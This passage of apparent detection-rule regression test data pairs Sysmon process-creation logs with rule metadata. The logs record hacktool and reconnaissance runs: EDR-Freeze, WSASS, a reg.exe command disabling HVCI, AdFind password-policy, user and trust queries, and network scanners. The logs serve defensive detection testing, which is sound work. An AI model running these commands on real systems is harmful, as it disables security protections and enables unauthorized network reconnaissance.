\"ProcessGuid\": \"0197231E-07FD-6928-290C-000000000D00\",\n      \"ProcessId\": 9388,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\EDRFreeze-gnu.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"CommandLine\": \"EDRFreeze-gnu.exe  3472 10000\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=67582B0B646E9E23846A8A9D9E412DCFABC0CCA0,MD5=A3BE334229BEBE056335780502747595,SHA256=0502C36D1F146A6B6BE31F7D7D65FEEF96A3FB3F3743DFFC38BB47AE426849F3,IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7\",\n      \"ParentProcessGuid\": \"0197231E-CC5A-6927-B80A-000000000D00\",\n      \"ParentProcessId\": 4952,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml",
    "content": "id: f668b689-59c5-41a7-bc0b-22168d3df14e\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: c598cc0c-9e70-4852-b9eb-8921af79f598\n      title: Hacktool - EDR-Freeze Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:57:32.087108Z\"\n        }\n      },\n      \"EventRecordID\": 676334,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:57:32.080\",\n      \"ProcessGuid\": \"0197231E-046C-6928-150C-000000000D00\",\n      \"ProcessId\": 7088,\n      \"Image\": \"C:\\\\Users\\\\Public\\\\wsass\\\\WSASS.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"-\",\n      \"Product\": \"-\",\n      \"Company\": \"-\",\n      \"OriginalFileName\": \"-\",\n      \"CommandLine\": \"WSASS.exe  WerFaultSecure.exe 860\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Public\\\\wsass\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=63AF15DCCB5CA8704918B7A8BFD0308726B2D7FD,MD5=D7A969E5A3636BF8FC9CA8A72021BFDC,SHA256=0977C9337EC1215C48A666464AFDA5C9A30CD24999A5F8E821E672991864A74C,IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42\",\n      \"ParentProcessGuid\": \"0197231E-0250-6928-D30B-000000000D00\",\n      \"ParentProcessId\": 11640,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml",
    "content": "id: e3ffac4e-8507-43f9-9542-4c9f10f49d3a\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 589ac73f-8e12-409c-964e-31a2f5775ae2\n      title: HackTool - WSASS Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:25:20.222853Z\"\n        }\n      },\n      \"EventRecordID\": 90965,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-23 02:25:20.191\",\n      \"ProcessGuid\": \"0197231E-FD90-6949-5110-000000000D00\",\n      \"ProcessId\": 10104,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg.exe  add \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\DeviceGuard\\\\Scenarios\\\\HypervisorEnforcedCodeIntegrity\\\" /v \\\"Enabled\\\" /t REG_DWORD /d 0 /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-5032-6940-AAE2-070000000000\",\n      \"LogonId\": \"0x7e2aa\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-FB8C-6949-2310-000000000D00\",\n      \"ParentProcessId\": 22176,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml",
    "content": "id: 7c72394d-cb39-4d53-836a-ebc524ee1685\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 6225c53a-a96e-4235-b28f-8d7997cd96eb\n      title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T09:37:40.974119Z\"\n        }\n      },\n      \"EventRecordID\": 650014,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 09:37:40.972\",\n      \"ProcessGuid\": \"14207D89-F764-68F9-2410-000000003F02\",\n      \"ProcessId\": 4316,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe   -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-F57C-68F9-D70F-000000003F02\",\n      \"ParentProcessId\": 6488,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml",
    "content": "id: de5c7702-3eb3-41be-ae33-b36a6f13d985\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T09:30:03.278177Z\"\n        }\n      },\n      \"EventRecordID\": 649847,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 09:30:03.253\",\n      \"ProcessGuid\": \"14207D89-F59B-68F9-DB0F-000000003F02\",\n      \"ProcessId\": 6504,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe  -f (objectcategory=person)\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-F57C-68F9-D70F-000000003F02\",\n      \"ParentProcessId\": 6488,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml",
    "content": "id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 514e7e3e-b3b4-4a67-af60-be20f139198b\n      title: PUA - AdFind.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T11:32:08.872401Z\"\n        }\n      },\n      \"EventRecordID\": 651803,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 11:32:08.871\",\n      \"ProcessGuid\": \"14207D89-1238-68FA-4A13-000000003F02\",\n      \"ProcessId\": 8080,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\AdFind.exe\",\n      \"FileVersion\": \"1.62.0.6172\",\n      \"Description\": \"-\",\n      \"Product\": \"AdFind\",\n      \"Company\": \"www.joeware.net\",\n      \"OriginalFileName\": \"AdFind.exe\",\n      \"CommandLine\": \"AdFind.exe  -s trustdmp\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\AdFind\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201\",\n      \"ParentProcessGuid\": \"14207D89-1136-68FA-2D13-000000003F02\",\n      \"ParentProcessId\": 1648,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml",
    "content": "id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9a132afa-654e-11eb-ae93-0242ac130002\n      title: PUA - AdFind Suspicious Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:01:48.031627Z\"\n        }\n      },\n      \"EventRecordID\": 650317,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:01:48.012\",\n      \"ProcessGuid\": \"14207D89-FD0C-68F9-D610-000000003F02\",\n      \"ProcessId\": 2064,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\advanced_ip_scanner.exe\",\n      \"FileVersion\": \"2.5.4594.1\",\n      \"Description\": \"Advanced IP Scanner\",\n      \"Product\": \"Advanced IP Scanner\",\n      \"Company\": \"Famatech Corp.\",\n      \"OriginalFileName\": \"advanced_ip_scanner.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\advanced_ip_scanner.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Program Files (x86)\\\\Advanced IP Scanner\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0\",\n      \"ParentProcessGuid\": \"14207D89-FCFD-68F9-D010-000000003F02\",\n      \"ParentProcessId\": 3240,\n      \"ParentImage\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-F5HMR.tmp\\\\Advanced_IP_Scanner_2.5.4594.1.tmp\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-F5HMR.tmp\\\\Advanced_IP_Scanner_2.5.4594.1.tmp\\\" /SL5=\\\"$E0218,20439558,139776,C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml",
    "content": "id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f\n      title: PUA - Advanced IP Scanner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:11:05.435406Z\"\n        }\n      },\n      \"EventRecordID\": 650602,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:11:05.414\",\n      \"ProcessGuid\": \"14207D89-FF39-68F9-1A11-000000003F02\",\n      \"ProcessId\": 7316,\n      \"Image\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\advanced_port_scanner.exe\",\n      \"FileVersion\": \"-\",\n      \"Description\": \"Advanced Port Scanner\",\n      \"Product\": \"Advanced Port Scanner\",\n      \"Company\": \"Famatech Corp.\",\n      \"OriginalFileName\": \"advanced_port_scanner.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\advanced_port_scanner.exe\\\" /portable \\\"C:/Users/SwachchhandaP/Downloads/\\\" /lng en_us\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\Advanced Port Scanner 2\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-91E6-68F9-0F94-460000000000\",\n      \"LogonId\": \"0x46940f\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C\",\n      \"ParentProcessGuid\": \"14207D89-FF2E-68F9-1911-000000003F02\",\n      \"ParentProcessId\": 3972,\n      \"ParentImage\": \"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-90PLO.tmp\\\\Advanced_Port_Scanner_2.5.3869.tmp\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\SWACHC~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-90PLO.tmp\\\\Advanced_Port_Scanner_2.5.3869.tmp\\\" /SL5=\\\"$E0634,19769177,139776,C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\Advanced_Port_Scanner_2.5.3869.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml",
    "content": "id: 998b5845-1623-4b2f-b9d1-bfc402172d45\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 54773c5f-f1cc-4703-9126-2f797d96a69d\n      title: PUA - Advanced Port Scanner Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-23T10:24:32.948699Z\"\n        }\n      },\n      \"EventRecordID\": 650887,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3076,\n          \"ThreadID\": 4936\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-23 10:24:32.936\",\n      \"ProcessGuid\": \"14207D89-0260-68FA-9511-000000003F02\",\n      \"ProcessId\": 4220,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\advancedrun-x64\\\\AdvancedRun.exe\",\n      \"FileVersion\": \"1.51\",\n      \"Description\": \"Run a program with different settings that you choose.\",\n      \"Product\": \"AdvancedRun\",\n      \"Company\": 